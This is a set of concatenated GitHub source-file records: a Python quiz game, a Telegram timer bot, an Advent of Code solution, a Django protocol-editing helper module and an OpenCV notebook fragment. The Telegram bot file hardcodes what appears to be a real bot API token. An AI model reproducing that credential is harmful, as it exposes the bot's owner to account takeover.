an if statement in Python?\\n (1)if x > y then: \\n (2)if (x > y)\\n (3)if x > y:\"]\r\n\r\n Q7=random.choice(Q7_list)\r\n print(Q7)\r\n ans7_index=Q7_list.index(Q7)\r\n A7_list=[\"LIST\",\"SET\",\"if x > y:\"]\r\n ans7=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n elif ans7==A7_list[ans7_index] or ans7==\"3\":\r\n print(\"correct!\")\r\n p_score+=1\r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n Q8_list=[\"Q8.How do you start writing a while loop in Python?\\n (1)while x > y:\\n (2)while x > y {\\n (3)x > y while {\\n (4)while (x > y)\"\r\n ,\"Q8.How do you start writing a for loop in Python?\\n (1)for x in y:\\n (2)for each x in y:\\n (3)foreach x in y:\"\r\n ,\"Q8.Which statement is used to stop a loop?\\n (1)break\\n (2)stop\\n (3)return\\n (4)exit\"]\r\n\r\n Q8=random.choice(Q8_list)\r\n print(Q8)\r\n ans8_index=Q8_list.index(Q8)\r\n A8_list=[\"while x > y:\",\"for x in y:\",\"break\"]\r\n ans8=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans8==A8_list[ans8_index] or ans8==\"1\":\r\n print(\"correct!\")\r\n p_score+=1\r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n Q9_list=[\"Q9.What is the output of 'you are doing well'[2:999]?\\n (1)' '\\n (2)Index error\\n (3)'you are doing well'\\n (4)'u are doing well'\"\r\n ,\"\"\"Q9.y = [4, 5,1j] then y.sort()?\\n (1)[1j,4,5]\\n (2)[5,4,1j]\\n (3)[4,5,1j]\\n (4)Type Error\"\"\"\r\n ,\"\"\"Q9.Suppose we are given two sets (s1 & s2), then what is the output of the code −\r\ns1 + s2\\n (1)Adds the elements of the both the sets.\\n (2)Removes the repeating elements and adds both the sets.\\n (3)Output will be stored in S1.\\n (4)It is an illegal command.\"\"\"]\r\n\r\n Q9=random.choice(Q9_list)\r\n print(Q9)\r\n ans9_index=Q9_list.index(Q9)\r\n A9_list=[\"'u are doing well'\",\"Type Error\",\"It is an illegal command.\"]\r\n ans9=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans9==A9_list[ans9_index] or ans9==\"4\":\r\n print(\"correct!\")\r\n p_score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n Q10_list=[\"Q10.x = 36 / 4 * (3 + 2) * 4 + 2 then print(x)?\\n (1)182.0\\n (2)37\\n (3)117\\n (4)The Program executed with errors\"\r\n ,\"Q10.p, q, r = 10, 20 ,30 then print(p, q, r)? 
\\n (1)10 20 30\\n (2)10 20\\n (3)Error: invalid syntax\"]\r\n\r\n Q10=random.choice(Q10_list)\r\n print(Q10)\r\n ans10_index=Q10_list.index(Q10)\r\n A10_list=[\"182.0\",\"10 20 30\"]\r\n ans10=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans10==A10_list[ans10_index] or ans10==\"1\":\r\n print(\"correct!\")\r\n p_score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n break\r\n sleep(1)\r\n print(\"Time Up\")\r\n print(\"Score:{}\".format(p_score))\r\n t_p_score=p_score\r\n if p_score==10:\r\n total_seconds=time.time()-total_time\r\n minutes=total_seconds//60\r\n second=total_seconds%60\r\n \r\n if minutes==0 and second<=59:\r\n print(\"Congratulations, you answered all 10 questions in %.2f seconds\"%second)\r\n else:\r\n print(\"Congratulations, you answered all 10 questions in %d minutes %.2f seconds\"%(minutes,second)) \r\n \r\n \r\nt_m_score=0 \r\ndef math_Question():\r\n global t_m_score\r\n score=0\r\n total_time=time.time()\r\n quiz_timer_thread=threading.Thread(target=quiz_timer)\r\n quiz_timer_thread.start()\r\n print(\"Time Start Now\")\r\n\r\n while my_timer>0:\r\n Q1a=random.randint(1,10)\r\n Q1b=random.randint(1,10)\r\n ans1=Q1a+Q1b\r\n print(\"Q1.A={} and B={} C=A+B then C?\\n \".format(Q1a,Q1b),end=\"\")\r\n print(\"1.{}\".format(random.randint(1,100))+\"\\t2.{}\".format(random.randint(1,100))\r\n +\"\\n 3.{}\".format(ans1)+\"\\t4.{}\".format(random.randint(1,100)))\r\n ANS1=input(\" ANS:\")\r\n \r\n if my_timer==0 :\r\n break\r\n elif ANS1==str(ans1) or ANS1==\"3\":\r\n print(\"CORRECT!\")\r\n score+=1\r\n else:\r\n print(\"INCORRECT!\")\r\n\r\n print()\r\n if my_timer==0:\r\n break\r\n Q1a=random.randint(1,10)\r\n Q1b=random.randint(1,10)\r\n option1=random.randint(1,100) \r\n option2=random.randint(1,100)\r\n option3=random.randint(1,100)\r\n ans2=Q1a*Q1b\r\n print(\"Q2.A={} and B={} C=A*B then C=?\\n\".format(Q1a,Q1b),end=\"\")\r\n print(\" 1.{}\\t2.{}\\n 3.{}\\t4.{}\".format(option1,ans2,option3,option2))\r\n ANS2=input(\" ANS:\")\r\n \r\n if my_timer==0:\r\n break\r\n elif ANS2==str(ans2) or ANS2==\"2\": \r\n print(\"CORRECT!\")\r\n score+=1\r\n else:\r\n print(\"INCORRECT!\")\r\n print()\r\n \r\n if my_timer==0:\r\n break\r\n\r\n Q3a=random.randint(1,100)\r\n Q3b=random.randint(1,10)\r\n Q3c=random.randint(1,10)\r\n Q3d=random.randint(1,100)\r\n\r\n option1=round(random.uniform(1,100),2)\r\n option2=round(random.uniform(1,100),2)\r\n option3=round(random.uniform(1,100),2)\r\n ans3=round(Q3a/(Q3b/Q3c)+Q3d,2)
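\r\n # Worked example (illustrative): a=10, b=2, c=5, d=7 -> 10/(2/5)+7 = 25+7 = 32.0;\r\n # the divisor is the quotient b/c, so it is evaluated before the division and the addition.\r\n print(\"Q3.Divide {} by {}/{} and add {}. 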
What is the answer?\\n\".format(Q3a,Q3b,Q3c,Q3d),end=\"\")\r\n print(\" (1){}\\t(2){}\\n (3){}\\t(4){}\".format(option1,option3,option2,ans3))\r\n ANS3=input(\" ANS:\")\r\n \r\n if my_timer==0:\r\n break\r\n elif ANS3==str(ans3) or ANS3==\"4\": \r\n print(\"CORRECT!\")\r\n score+=1\r\n else:\r\n print(\"INCORRECT!\")\r\n print()\r\n \r\n if my_timer==0:\r\n break\r\n \r\n Q4a=random.randint(1,100)\r\n Q4b=random.randint(1,5)\r\n Q4c=random.randint(1,5)\r\n\r\n option1=round(random.uniform(1,312500),2)\r\n option2=round(random.uniform(1,312500),2)\r\n option3=round(random.uniform(1,312500),2)\r\n ans4=round(Q4a*(Q4b**Q4c))\r\n print(\"Q4.({}*{}**{})=?\\n\".format(Q4a,Q4b,Q4c))\r\n print(\" (1){}\\t(2){}\\n (3){}\\t(4){}\".format(option1,option3,option2,ans4))\r\n ANS4=input(\" ANS:\")\r\n if my_timer==0:\r\n break\r\n elif ANS4==str(ans4) or ANS4==\"4\": \r\n print(\"CORRECT!\")\r\n score+=1\r\n else:\r\n print(\"INCORRECT!\")\r\n print()\r\n \r\n if my_timer==0:\r\n break\r\n \r\n\r\n Q5a=random.randint(1,20000)\r\n Q5b=random.randint(1,20000)\r\n Q5c=random.randint(1,20000)\r\n\r\n ans5=Q5c+Q5a+Q5b\r\n option1=ans5+random.randint(1,1000)\r\n option2=ans5+random.randint(1,1000)\r\n option3=ans5+random.randint(1,1000)\r\n print(\"Q5.(?)-{}-{}={}\\n\".format(Q5a,Q5b,Q5c))\r\n print(\" (1){}\\t(2){}\\n (3){}\\t(4){}\".format(ans5,option1,option2,option3))\r\n ANS5=input(\" ANS:\")\r\n if my_timer==0:\r\n break\r\n elif ANS5==str(ans5) or ANS5==\"1\": \r\n print(\"CORRECT!\")\r\n score+=1\r\n else:\r\n print(\"INCORRECT!\")\r\n print()\r\n \r\n if my_timer==0:\r\n break\r\n Q6_list=[\"Q6.What is the symbol of pi?\\n(1)π\\n(2)€\\n(3)Ω\\n(4)∞\"\r\n ,\"Q6.Arrange the numbers in ascending order: 36, 12, 29, 21, 7? \\n(1)7, 12, 21, 29, 36\\n(2)36, 29, 21, 12, 7\\n(3)36, 29, 7, 21, 12\\n(4)None of these\"\r\n ,\"Q6.20 is divisible by ……… .\\n(1)1\\n(2)3\\n(3)7\\n(4)None of these\"]\r\n\r\n Q6=random.choice(Q6_list)\r\n print(Q6)\r\n ans6_index=Q6_list.index(Q6)\r\n A6_list=[\"π\",\"7, 12, 21, 29, 36\",\"1\"]\r\n ans6=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans6==A6_list[ans6_index] or ans6==\"1\":\r\n print(\"correct!\")\r\n score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n Q7_list=[\"Q7.What is the smallest three digit number?\\n(1)101\\n(2)999\\n(3)111\\n(4)100\"\r\n ,\"Q7.What is three fifth of 100?\\n(1)3\\n(2)5\\n(3)20\\n(4)60\"\r\n ,\"Q7.What is the remainder of 21 divided by 7?\\n(1)21\\n(2)7\\n(3)1\\n(4)None of these\"]\r\n\r\n Q7=random.choice(Q7_list)\r\n print(Q7)\r\n ans7_index=Q7_list.index(Q7)\r\n A7_list=[\"100\",\"60\",\"None of these\"]\r\n ans7=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans7==A7_list[ans7_index] or ans7==\"4\":\r\n print(\"correct!\")\r\n score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n Q8_list=[\"Q8.What is 7% equal to?\\n(1)0.007\\n(2)0.7\\n(3)0.07\\n(4)7\"\r\n ,\"Q8.What is the value of x if x2 = 169?\\n(1)1\\n(2)169\\n(3)13\\n(4)338\"\r\n ,\"Q8.What is the reciprocal of 17/15?\\n(1)1.13\\n(2)17/15\\n(3)15/17\\n(4)30/34\"]\r\n\r\n Q8=random.choice(Q8_list)\r\n print(Q8)\r\n ans8_index=Q8_list.index(Q8)\r\n A8_list=[\"0.07\",\"13\",\"15/17\"]\r\n ans8=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans8==A8_list[ans8_index] or ans8==\"3\":\r\n print(\"correct!\")\r\n score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n
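\r\n # (added note) Q9 draws number-pattern items; e.g. 1, 9, 25, 49 are the squares\r\n # of consecutive odd numbers, so the missing value is 9**2 = 81 (option 2).\r\n Q9_list=[\"Q9.Which number is missing? 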
1, 9, 25, 49, (?)\\n(1)121\\n(2)81\\n(3)16\\n(4)169\"\r\n ,\"Q9.From the alternatives, select the set which is most alike the set (23, 29, 31).\\n(1) (17, 21, 29)\\n(2) (41, 43, 47)\\n(3) (31, 37, 49)\\n(4) (13, 15, 23)\"\r\n ,\"Q9.What is 121 times 11?\\n(1)1313\\n(2)1331\\n(3)1133\\n(4)3131\"]\r\n\r\n Q9=random.choice(Q9_list)\r\n print(Q9)\r\n ans9_index=Q9_list.index(Q9)\r\n A9_list=[\"81\",\"(41, 43, 47)\",\"1331\"]\r\n ans9=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans9==A9_list[ans9_index] or ans9==\"2\":\r\n print(\"correct!\")\r\n score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n \r\n Q10_list=[\"Q10.3456 ÷ 12 ÷ 8 = ?\\n(1)33.5\\n(2)36.5\\n(3)50\\n(4)36\"\r\n ,\"Q10. 106 × 106 – 94 × 94 = ?\\n(1)2004\\n(2)1904\\n(3)1906\\n(4)2400\"\r\n ,\"Q10.10^-2 means …………. .\\n(1)milli\\n(2)micro\\n(3)deci\\n(4)centi\"]\r\n\r\n Q10=random.choice(Q10_list)\r\n print(Q10)\r\n ans10_index=Q10_list.index(Q10)\r\n A10_list=[\"36\",\"2400\",\"centi\"]\r\n ans10=input(\"ANS:\")\r\n if my_timer==0:\r\n break\r\n if ans10==A10_list[ans10_index] or ans10==\"4\":\r\n print(\"correct!\")\r\n score+=1\r\n \r\n else:\r\n print(\"incorrect!\")\r\n print()\r\n if my_timer==0:\r\n break\r\n\r\n break\r\n sleep(1)\r\n \r\n print(\"Time Up\")\r\n print(\"Score:{}\".format(score))\r\n t_m_score=score\r\n if score==10:\r\n total_seconds=time.time()-total_time\r\n minutes=total_seconds//60\r\n second=total_seconds%60\r\n\r\n if minutes==0 and second<=59:\r\n print(\"Congratulations, you answered all 10 questions in %.2f seconds\"%second)\r\n else:\r\n print(\"Congratulations, you answered all 10 questions in %d minutes %.2f seconds\"%(minutes,second)) \r\n\r\n\r\n \r\n\r\n\r\nwhile True:\r\n print(\"\"\"----------------------------------\r\n- Quiz With Game -\r\n- -\r\n- 1.Python Quiz - \r\n- 2.Math Quiz -\r\n- 3.Tic-Tok game -\r\n- 4.Exit -\r\n- - \r\n----------------------------------\"\"\")\r\n try:\r\n ch=input(\"Enter your choice:\")\r\n except Exception:\r\n print(\"Enter right input!\")\r\n continue\r\n if ch==\"1\":\r\n Python_Question()\r\n elif ch==\"2\":\r\n math_Question()\r\n elif ch==\"3\":\r\n if t_p_score>=6 and t_m_score>=6:\r\n tic_tok.Tik_tac()\r\n else:\r\n print(\"\"\"Your score is too low!\\nYou need at least 6/10 in the Python quiz and 6/10 in the math quiz to play the game!\"\"\")\r\n\r\n elif ch==\"4\":\r\n break\r\n else:\r\n print(\"Enter right input between 1 to 4 only!\")\r\n \r\n","repo_name":"jitendra10061997/Python-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":18573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17629395202","text":"import telebot\n\nimport schedule\nimport threading\nimport helper\n\nfrom threading import Thread\nfrom time import sleep\n\nfrom telebot import types\n\nfrom carusel import *\nfrom bot import Bot\nfrom good_words import GoodWords\nfrom user import User\n\n\nbot = Bot(\"5709047064:AAE9QPGMacQ_nlMXVvqq2KICcz0XIJpNWNs\", threaded=True)\n\n\ndef schedule_checker(): # broadcast loop\n while True:\n schedule.run_pending()\n sleep(1)\n\n\ndef eq_msg(text):\n def f(msg):\n return text == msg.text\n return f\n\n\n@bot.message_handler(commands=['start'])\ndef welcome(message: types.Message):\n markup = helper.MessageHelper.start_markup()\n\n bot.users[message.from_user.id] = User(bot, message.from_user.id)
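\n # (added note) every /start registers a fresh User keyed by Telegram id;\n # bot.carusels later routes that user's replies through multi-step dialogs\n # (see handle_carusel below).\n bot.send_message(message.from_user.id, \"Hallo\", 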
reply_markup=markup)\n\n\n@bot.message_handler(func=eq_msg(\"Einen Timer hinzufugen\"))\ndef add_timer(msg: types.Message):\n bot.send_message(msg.from_user.id, \"Eintreten die Zeit\", \n reply_markup=helper.MessageHelper.clear_murkup)\n bot.carusels[msg.from_user.id] = HealTimerCarusel(bot, bot.users[msg.from_user.id])\n\n\n@bot.message_handler(func=eq_msg(\"Timer loschen\"))\ndef delete_timer(msg: types.Message):\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True)\n user: User = bot.users[msg.from_user.id]\n timers = user.get_timers()\n \n if not timers:\n bot.reply_to(msg, \"Keine Timer!\")\n return\n for time in timers:\n item = types.KeyboardButton(Time.minuts_to_str(time))\n markup.add(item)\n\n\n bot.carusels[msg.from_user.id] = TimerDeleteCarusel(bot, bot.users[msg.from_user.id])\n bot.reply_to(msg, \"Timer auswahlen\", reply_markup=markup)\n\n\n@bot.message_handler(func=lambda msg: msg.from_user.id in bot.carusels)\ndef handle_carusel(msg: types.Message):\n bot.carusels[msg.from_user.id].step(msg)\n if bot.carusels[msg.from_user.id].is_ready:\n bot.carusels[msg.from_user.id].delete()\n bot.reply_to(msg, GoodWords.get_good_phrase(), \n reply_markup=helper.MessageHelper.start_markup())\n\n\nThread(target=schedule_checker).start()\nbot.polling(none_stop=True)\n","repo_name":"nikita0607/furmut","sub_path":"bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39266824404","text":"#!/bin/python3\n\n\ndef calculateItemPriority(item):\n # 'a'-'z' map to 1..26; for uppercase the first expression is negative and\n # adding 32 + 26 shifts 'A'-'Z' to 27..52\n p = ord(item) - ord('a') + 1\n if p < 0:\n p += 32 + 26\n\n return p\n\ntotal = 0\nrucksacks = [r.strip() for r in open(\"input\").readlines()]\n\ngroups = len(rucksacks) // 3\n\nfor group in range(groups):\n group_rucksacks = rucksacks[group*3:(group+1)*3]\n commonItems = set(group_rucksacks[0])\n for other_rucksack in group_rucksacks[1:]:\n commonItems &= set(other_rucksack)\n\n print(commonItems)\n commonItem = list(commonItems)[0]\n priority = calculateItemPriority(commonItem)\n print(priority)\n total += priority\n\nprint(total)\n","repo_name":"meientau/adventofcode","sub_path":"2022/3/3b.py","file_name":"3b.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12394547602","text":"__author__ = 'beekhuiz'\nfrom .forms import BasicDatasetForm, PartnerForm, PublicationForm, DataReqForm, ExpStepForm, ReportingForm, UserForm, UserProfileForm\nfrom .models import UserProfile, BasicDataset, Partner, Publication, DataReq, ExpStep, Reporting\nfrom django.core.mail import send_mail\nimport datetime\nimport json\n\n\ndef sendEmailConfirmationEditRights(request, datasetID, userProfile):\n '''\n :param request: all request info; needed to retrieve the URL of the page that can now be edited\n :param datasetID: id of the dataset (= protocol) for which editing rights are given\n :param userProfile: the userprofile information of the person that has gained editing rights\n :return: a message stating if an email was sent successfully to the person gaining editing rights\n '''\n coreData = BasicDataset.objects.get(id=datasetID)\n leadUser = coreData.leadUser\n form_link = 'http://' + request.META['HTTP_HOST'] + \"/form/\" + str(datasetID)\n\n # send an email\n htmlMessage = \"<p>Dear \" + userProfile.user.username + ',<br>' + \\\n str(leadUser) + \" has given you the rights to edit the protocol \" + 
coreData.shortTitle + \".<br>\" + \"Please click \" + \\\n \"<a href=\\\"\"+form_link+\"\\\">HERE</a> to start editing the protocol.<br><br></p>\"\n\n nrMessagesSend = send_mail(subject=\"Edit rights granted for \" + coreData.shortTitle, message=\"\",\n from_email=\"switchon.vwsl@gmail.com\", recipient_list=[str(userProfile.user.email)],\n html_message=htmlMessage)\n\n if nrMessagesSend == 1:\n returnMessage = str(leadUser) + ' has given ' + str(userProfile.user.username) + \" rights to edit the protocol \" + coreData.shortTitle + \". \" + \\\n \"An email has been sent to \" + str(userProfile.user) + \" (\" + str(userProfile.user.email) + \")\" + \" to inform about the new edit rights.\"\n else:\n returnMessage = str(leadUser) + ' has given ' + str(userProfile.user.username) + \" rights to edit the protocol \" + coreData.shortTitle + \". \" + \\\n \"There was an error in sending an email to \" + str(userProfile.user) + \" (\" + str(userProfile.user.email) + \")\" + \" to inform about the new edit rights.\"\n\n return returnMessage\n\n\n\ndef getProtocolInfoInJSON(datasetID):\n '''\n Retrieve all info of a protocol in JSON format, which can be easily read by javascript\n :param datasetID: ID of the dataset (protocol) to get all information from\n :return: dictionary with all information of the dataset\n '''\n\n # Load in data\n experimentInfoDict = getExperimentInfoDict(datasetID)\n partnersList = getPartnersList(datasetID)\n publicationsList = getPublicationsList(datasetID)\n reqsList = getListSteps(datasetID, DataReq)\n expStepsList = getListSteps(datasetID, ExpStep)\n reportingsList = getListSteps(datasetID, Reporting)\n\n context = {}\n context.update({\n 'edit': True,\n 'datasetID': datasetID,\n 'experimentInfoJSON': json.dumps(experimentInfoDict),\n 'partnersJSON': json.dumps(partnersList),\n 'publicationsJSON': json.dumps(publicationsList),\n 'reqsJSON': json.dumps(reqsList),\n 'expStepsJSON': json.dumps(expStepsList),\n 'reportingsJSON': json.dumps(reportingsList),\n })\n\n return context\n\n\ndef getAllFormInfo(datasetID):\n '''\n :param datasetID: ID of the dataset (protocol) to get all information from\n :return: a list of Django forms that are used to create the form HTML-page\n '''\n coreData = BasicDataset.objects.get(id=datasetID)\n formCore = BasicDatasetForm(instance=coreData, auto_id='id_basic_%s')\n\n formPartner = PartnerForm(auto_id='id_partner_%s')\n formDataReq = DataReqForm(auto_id='id_req_%s')\n formExpStep = ExpStepForm(auto_id='id_exp_%s')\n formReporting = ReportingForm(auto_id='id_reporting_%s')\n formPublication = PublicationForm(auto_id='id_publication_%s')\n formList = [\n ['Basic', formCore],\n ['Partner', formPartner],\n ['DataReq', formDataReq],\n ['ExpStep', formExpStep],\n ['Reporting', formReporting],\n ['Publication', formPublication],\n ]\n\n return formList\n\n\ndef updateLastUpdate(datasetID):\n BasicDataset.objects.filter(id=datasetID).update(\n dateLastUpdate=str(datetime.date.today()))\n\ndef createPublicationModelFromClient(postDict, update):\n '''\n Creates a new data Publication model object using an AJAX call from the client\n :param postDict: information of the Partner from the client\n :param update: boolean indicating whether it is an update or an addition\n :return: none\n '''\n\n # get the foreign key of the protocol dataset of this partner\n dataset = BasicDataset.objects.get(id=postDict['datasetID'])\n\n if update:\n Publication.objects.filter(id=postDict['publicationID']).update(\n name=postDict['name'],\n type=postDict['type'])\n 
else:\n # create new publication object\n publicationObj = Publication(\n dataset = dataset,\n name=postDict['name'],\n type=postDict['type']\n )\n publicationObj.save()\n\n updateLastUpdate(postDict['datasetID'])\n\ndef createPartnerModelFromClient(postDict, update):\n '''\n Creates a new data Partner model object using an AJAX call from the client\n :param postDict: information of the Partner from the client\n :param update: boolean indicating whether it is an update or an addition\n :return: none\n '''\n\n # get the foreign key of the protocol dataset of this partner\n dataset = BasicDataset.objects.get(id=postDict['datasetID'])\n\n # store the lead as a boolean\n lead = True\n if postDict['lead'] == 'False':\n lead = False\n\n if update:\n Partner.objects.filter(id=postDict['partnerID']).update(\n name=postDict['name'],\n email=postDict['email'],\n organisation=postDict['organisation'],\n lead=lead)\n else:\n # create new partner object\n partnerObj = Partner(\n dataset = dataset,\n name=postDict['name'],\n email=postDict['email'],\n organisation=postDict['organisation'],\n lead=lead\n )\n partnerObj.save()\n\n updateLastUpdate(postDict['datasetID'])\n\n\ndef getExperimentInfoDict(datasetID):\n '''\n Store all experiment information in a dictionary\n :param datasetID: id of the dataset for which the experiment info is retrieved\n :return: dictionary of experiment info\n '''\n\n existingExperimentInfo = BasicDataset.objects.get(id=datasetID)\n\n existingExperimentInfoDict = {\n 'title': existingExperimentInfo.title,\n 'shortTitle': existingExperimentInfo.shortTitle,\n 'experimentIdea': existingExperimentInfo.experimentIdea,\n 'hypothesis': existingExperimentInfo.hypothesis,\n 'researchObjective': existingExperimentInfo.researchObjective,\n 'dateLastUpdate': str(existingExperimentInfo.dateLastUpdate),\n }\n return existingExperimentInfoDict\n\ndef getPublicationsList(datasetID):\n '''\n Store all publication information in an array list\n :param datasetID: id of the dataset for which the publication are retrieved\n :return: list with all publication\n '''\n\n existingPublications = Publication.objects.filter(dataset__id=datasetID)\n\n existingPublicationsList = []\n for publication in existingPublications:\n publicationDict = {\n \"id\": publication.id,\n \"name\": publication.name,\n \"type\": publication.type,\n }\n existingPublicationsList.append(publicationDict)\n\n return existingPublicationsList\n\ndef getPartnersList(datasetID):\n '''\n Store all partner information in an array list\n :param datasetID: id of the dataset for which the partners are retrieved\n :return: list with all partners\n '''\n\n existingPartners = Partner.objects.filter(dataset__id=datasetID)\n\n existingPartnersList = []\n for partner in existingPartners:\n partnerDict = {\n \"id\": partner.id,\n \"name\": partner.name,\n \"email\": partner.email,\n \"organisation\": partner.organisation,\n \"lead\": str(partner.lead),\n }\n existingPartnersList.append(partnerDict)\n\n return existingPartnersList\n\n\ndef createStepModelFromClient(postDict, update, allObjects):\n '''\n Creates a new step model object (DataReq, ExpStep or Reporting) using an AJAX call from the client\n :param postDict: information of the step from the client\n :param update: boolean indicating whether it is an update or an addition\n :return: none\n '''
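\n\n # Illustrative payload (assumption; keys as read below):\n # postDict = {'datasetID': 3, 'partnerID': 7, 'task': 'Collect samples',\n # 'properties': '...', 'deadline': '2016-05-01', 'done': 'True',\n # 'links': 'http://...', 'stepID': 12} # 'stepID' only matters when update=True\n dataset = BasicDataset.objects.get(id=postDict['datasetID'])\n partner = Partner.objects.get(id=postDict['partnerID'])\n\n # convert the 'done' checkbox to a boolean\n done = True\n if 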
postDict['done'] == 'False':\n done = False\n\n # non-mandatory 'links' field\n if 'links' in postDict:\n links = postDict['links']\n else:\n links = ''\n\n if update:\n allObjects.objects.filter(id=postDict['stepID']).update(\n dataset = dataset,\n task=postDict['task'],\n properties=postDict['properties'],\n links=links,\n partner = partner,\n deadline=postDict['deadline'],\n done=done\n )\n else:\n # create new step object\n newObject = allObjects(\n dataset = dataset,\n task=postDict['task'],\n taskNr=getNewTaskNr(postDict['datasetID'], allObjects),\n properties=postDict['properties'],\n links=links,\n partner = partner,\n deadline=postDict['deadline'],\n done=done\n )\n\n newObject.save()\n\n updateLastUpdate(postDict['datasetID'])\n\n\ndef getListSteps(datasetID, allObjects):\n\n '''\n Convert Django objects to a sorted list of dictionaries for use in the form\n :param datasetID: id of the dataset for which the info is retrieved\n :param allObjects: the objects (i.e. DataReq, ExpSteps or Reportings) that are converted to a list of dicts\n :return: sorted list of dictionaries of all objects\n '''\n\n existingObjects = allObjects.objects.filter(dataset__id=datasetID)\n existingObjectsList = []\n\n for existingObject in existingObjects:\n\n objectDict = {\n \"id\": existingObject.id,\n \"taskNr\": existingObject.taskNr,\n \"task\": existingObject.task,\n \"properties\": existingObject.properties,\n \"links\": existingObject.links,\n \"partnerID\": existingObject.partner.id,\n \"partnerName\": existingObject.partner.name,\n \"deadline\": str(existingObject.deadline),\n \"done\": str(existingObject.done),\n }\n\n existingObjectsList.append(objectDict)\n\n # sort on taskNr for better visualisation\n existingObjectsListSorted = sorted(existingObjectsList, key=lambda k: k['taskNr'])\n\n return existingObjectsListSorted\n\n\ndef getNewTaskNr(datasetID, allObjects):\n '''\n Gets a new task number when a new object is added to the list\n :param datasetID: id of the dataset (=protocol)\n :param allObjects: the objects (i.e. DataReq, ExpSteps or Reportings)\n :return: highest task number + 1\n '''\n datasetObjects = allObjects.objects.filter(dataset__id=datasetID)\n\n taskNrs = []\n\n for datasetObject in datasetObjects:\n taskNrs.append(datasetObject.taskNr)\n\n # check if there are already tasks defined; if not, task nr is 1\n if len(taskNrs) > 0:\n return max(taskNrs) + 1\n else:\n return 1\n\n\ndef updateTaskNrs(datasetID, objectID, allObjects):\n '''\n Update the task numbers when a step is deleted\n :param datasetID: id of the dataset (=protocol)\n :param objectID: the id of the object\n :param allObjects: the objects (i.e. DataReq, ExpSteps or Reportings)\n :return: none\n '''\n\n datasetObjects = allObjects.objects.filter(dataset__id=datasetID)\n deletedObject = allObjects.objects.get(pk=objectID)\n\n taskNrToDel = deletedObject.taskNr\n\n # shift the number of the tasks that come after the task to delete one place up\n for datasetObject in datasetObjects:\n if datasetObject.taskNr > taskNrToDel:\n datasetObject.taskNr -= 1\n datasetObject.save()
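\n\n# Example (illustrative): deleting the step with taskNr 2 from nrs [1, 2, 3, 4]\n# shifts 3 -> 2 and 4 -> 3, keeping the numbering gap-free; the two helpers below\n# swap adjacent numbers to move a step up or down in the list.\n\n\ndef increaseTaskNr(datasetID, objectID, allObjects):\n '''\n Move a task one position up the list by decreasing its task nr; the adjacent task's nr is increased in exchange.\n :param datasetID: id of the dataset (=protocol)\n :param objectID: the id of the object\n :param allObjects: the objects (i.e. 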
DataReq, ExpSteps or Reportings)\n :return: none\n '''\n\n objectToIncr = allObjects.objects.get(pk=objectID)\n origTaskNr = objectToIncr.taskNr\n\n if origTaskNr > 1:\n\n objectToDecr = allObjects.objects.filter(taskNr=origTaskNr-1, dataset__id = datasetID)[0]\n\n objectToIncr.taskNr = origTaskNr - 1\n objectToIncr.save()\n\n objectToDecr.taskNr = origTaskNr\n objectToDecr.save()\n\n\ndef decreaseTaskNr(datasetID, objectID, allObjects):\n '''\n Move a task one position down the list by increasing its task nr; the adjacent task's nr is decreased in exchange.\n :param datasetID: id of the dataset (=protocol)\n :param objectID: the id of the object\n :param allObjects: the objects (i.e. DataReq, ExpSteps or Reportings)\n :return: none\n '''\n\n objectToDecr = allObjects.objects.get(pk=objectID)\n origTaskNr = objectToDecr.taskNr\n\n # get all tasknrs to check if it is the lowest task\n datasetObjects = allObjects.objects.filter(dataset__id=datasetID)\n taskNrs = []\n\n for datasetObject in datasetObjects:\n taskNrs.append(datasetObject.taskNr)\n\n if origTaskNr < max(taskNrs):\n\n objectToIncr = allObjects.objects.filter(taskNr=origTaskNr+1, dataset__id = datasetID)[0]\n\n objectToDecr.taskNr = origTaskNr + 1\n objectToDecr.save()\n\n objectToIncr.taskNr = origTaskNr\n objectToIncr.save()","repo_name":"switchonproject/sip-html5-protocol-tool","sub_path":"protocoltool/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":14163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2894010985","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport cv2\nimport os\n\n\n# In[2]:\n\n\nget_ipython().run_line_magic('matplotlib', '')\n\n\n# In[3]:\n\n\nos.getcwd(),os.chdir(r'C:\\\Users\\\14049\\\WordAndStudy\\\Projects\\\学校\\\大三上\\\数字图像处理\\\数字图像处理实验材料\\\测试图像'),os.getcwd()\n\n\n# In[6]:\n\n\ndef cv2ShowImages(imgs):\n for i,img in enumerate(imgs):\n cv2.namedWindow(str(i),cv2.WINDOW_NORMAL)\n cv2.imshow(str(i),img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\n# In[4]:\n\n\nimage = 